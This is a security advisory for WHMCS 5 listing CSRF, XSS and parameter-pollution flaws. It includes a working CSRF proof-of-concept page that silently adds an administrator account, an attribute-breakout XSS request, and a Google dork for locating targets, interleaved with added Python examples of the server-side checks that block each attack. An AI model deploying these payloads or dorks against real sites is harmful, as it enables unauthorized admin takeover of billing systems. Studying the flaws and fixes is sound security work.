mrk studios Shadman Tanjim on May 30, 2012
WHMCS version 5 suffers from cross-site request forgery (CSRF), HTTP parameter pollution (HPP), and cross-site scripting (XSS) vulnerabilities.
Platforms: n/a
Category: webapps
Tags: exploit, web, vulnerability, xss, csrf
Source: packetstormsecurity.org

Exploit Code

WHMCS 5 Cross Site Request Forgery / Cross Site Scripting


##########################################################################################################################
# Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
# Version: 5.1 (latest at the time of writing); earlier versions may also be vulnerable
# Vendor: www.whmcs.com
# Date: 2012-05-30
# Tested on: win/linux
# Author/Found by: Shadman Tanjim
# Email: shadman2600@gmail.com
# Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
# Special Thanks: x8631p 
# Google Dork: "Powered by WHMCompleteSolution"  or  inurl:WHMCS 
############################################################################################################################

CSRF Vulnerability:

Affected pages (GET):
http://site.com/clientarea.php
http://site.com/admin/index.php
http://site.com/admin/login.php

Affected pages (POST):
http://site.com/admin/login.php
http://site.com/cart.php
http://site.com/admin/configadmins.php
http://site.com/pwreset.php


p0c:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>WHMCS CSRF ExpL0iT PoC</title>
<script language="javascript" type="text/javascript">

    function lifeissimple() {

        // Token value expected by the target instance; fill in before use.
        var token = "Token Value";

        // Fire the add-administrator request from the logged-in victim's browser.
        // An <img> can only issue a GET, so the parameters travel in the query string.
        var img = document.createElement("img");
        var site = "http://www.localhost.com:80";
        var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token + "&roleid=1&firstname=dead&lastname=cow&email=deadcow@deadcow.com&username=deadcow&password=deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English";
        img.setAttribute("src", requesturl);
        document.body.appendChild(img);

        // Follow-up request to the added=true page.
        var img2 = document.createElement("img");
        img2.setAttribute("src", site + "/billing/admin/configadmins.php?added=true&");
        document.body.appendChild(img2);
    }

</script>
</head>
<body onload="lifeissimple();">
<h2>WHMCS CSRF ExpL0iT PoC</h2>
</body>
</html>
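The PoC above depends on two things the server lets through: a GET that performs a state change, and a token parameter the attacker can fill in. The Python below is an added example of the server-side check that stops it; it is not WHMCS code, and the store and function names (SESSIONS, issue_token, verify_admin_save, replay_poc) and the request shape are assumptions made for the example. It replays the PoC's own URL against the check.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory session store for the example: session id -> CSRF token.
SESSIONS = {}

# The request the PoC's <img> issues, with its placeholder token (taken from the p0c above).
POC_URL = ("http://www.localhost.com:80/billing/admin/configadmins.php?action=save&id="
           "&token=Token%20Value&roleid=1&firstname=dead&lastname=cow"
           "&email=deadcow@deadcow.com&username=deadcow&password=deadcow&password2=deadcow"
           "&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English")


def issue_token(session_id):
    """Mint an unguessable token and bind it to the admin's session; the server
    embeds it as a hidden field in the 'add administrator' form."""
    token = secrets.token_hex(32)
    SESSIONS[session_id] = token
    return token


def verify_admin_save(method, url, body, session_id):
    """Decide whether a configadmins.php action=save request may proceed.

    Returns (accepted, reason).  All of the following must hold:
      1. the method is POST: an <img src> can only issue GETs, so the PoC's
         request is refused before any parameter is looked at;
      2. the token is read from the POST body, never from the query string,
         so it is not leaked through Referer headers or access logs;
      3. the supplied token matches the session's token (constant-time compare).
    """
    if method != "POST":
        return False, "state-changing action must be POST"
    expected = SESSIONS.get(session_id)
    if expected is None:
        return False, "no admin session"
    supplied = parse_qs(body, keep_blank_values=True).get("token", [""])[0]
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or wrong CSRF token"
    if parse_qs(urlsplit(url).query).get("action") != ["save"]:
        return False, "not a save action"
    return True, "accepted"


def replay_poc(session_id):
    """Replay the PoC's GET against the check using the victim's live session."""
    return verify_admin_save("GET", POC_URL, "", session_id)
```

An attacker who already holds the victim's real token can still succeed; the point of the check is that the token is random and bound to the session, so the "Token Value" placeholder in the PoC cannot be filled in without a separate leak.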


Cross-site Scripting (XSS) Vulnerability:

The search term is reflected inside a single-quoted HTML attribute; the payload closes the quote and injects an onerror event handler.

Request:

POST /knowledgebase.php?action=search HTTP/1.1
Host: site.com
Content-Type: application/x-www-form-urlencoded

search='%20onerror%3D'f(PSRyh)
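What the payload does to the page, and the output encoding that neutralises it, as an added example written for this edit (Python, not WHMCS code). The markup around the reflected term is an assumption chosen to match the payload's shape (a single-quoted value attribute on an input); html.parser stands in for the browser's tokenizer to show which attributes each rendering ends up with.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# The advisory's payload, URL-decoded: it closes a single-quoted attribute and
# starts a new onerror attribute.  f(PSRyh) is just the scanner's marker call.
PAYLOAD = unquote("'%20onerror%3D'f(PSRyh)")


def render_unsafe(term):
    """Assumed vulnerable rendering: the search term is copied verbatim into a
    single-quoted attribute, which is the context the payload is built for."""
    return "<input type='text' name='search' value='%s'>" % term


def render_safe(term):
    """Hardened rendering: attribute-context encoding turns both quote characters
    into entities (quote=True), so the term can never close the attribute."""
    return "<input type='text' name='search' value='%s'>" % html.escape(term, quote=True)


class _InputAttrs(HTMLParser):
    """Collect the attributes of the first <input> tag, as a browser would see them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def browser_view(markup):
    """Return {attribute name: value} for the rendered <input>.  html.parser
    unescapes entities in attribute values, so the safe rendering yields the
    original search text in 'value' and no 'onerror' attribute at all."""
    p = _InputAttrs()
    p.feed(markup)
    p.close()
    return p.attrs or {}
```

The probe payload only proves attribute breakout (there is no image to fail, so onerror never fires); the encoding fix is the same regardless of which event handler an attacker would actually use.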


HTTP Parameter Pollution:

1. Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636
   Affected parameter: a=add

2. Affected link: http://site.com/domainchecker.php?search=bulkregister&n946774=v992350
   Affected parameter: search=bulkregister

3. Affected link: http://site.com/cart.php?currency=2&gid=1&n972751=v976696
   Affected parameter: currency=2
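The scanner output above shows only that an extra parameter appended to each link is accepted; it does not say how a duplicate is consumed. The Python below is an added example (not WHMCS code) of why that matters and of the strict check a front end can apply: the same polluted query is read with PHP's last-wins semantics and with the first-wins semantics of many filters and proxies, and duplicate scalar names are refused while PHP array parameters such as the PoC's deptids[] stay allowed. The links are the page's own; pollute() and the accept_query() policy are assumptions made for the example.

```python
from urllib.parse import parse_qsl, urlsplit

# The three links reported above; the n...=v... pair is the scanner's marker parameter.
AFFECTED_LINKS = [
    "http://site.com/cart.php?a=add&domain=transfer&n913620=v992636",
    "http://site.com/domainchecker.php?search=bulkregister&n946774=v992350",
    "http://site.com/cart.php?currency=2&gid=1&n972751=v976696",
]


def pollute(url, name, value):
    """Append a second copy of an existing parameter, as an HPP attacker would."""
    return url + "&" + name + "=" + value


def _pairs(url):
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def last_wins(url):
    """PHP's $_GET semantics: for a repeated scalar name the last value is kept."""
    return dict(_pairs(url))


def first_wins(url):
    """Semantics of many filters and proxies: the first occurrence is kept, so a
    filter that approved a=add may forward a request PHP reads as a=view."""
    seen = {}
    for name, value in _pairs(url):
        seen.setdefault(name, value)
    return seen


def duplicated_names(url):
    """Scalar names that occur more than once.  PHP array parameters (name[]),
    such as the PoC's deptids[]=4&deptids[]=1, are legitimately repeated and
    are therefore ignored here."""
    counts = {}
    for name, _ in _pairs(url):
        if not name.endswith("[]"):
            counts[name] = counts.get(name, 0) + 1
    return sorted(name for name, n in counts.items() if n > 1)


def accept_query(url):
    """Strict policy: refuse any request on which two parsers could disagree."""
    return duplicated_names(url) == []
```
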

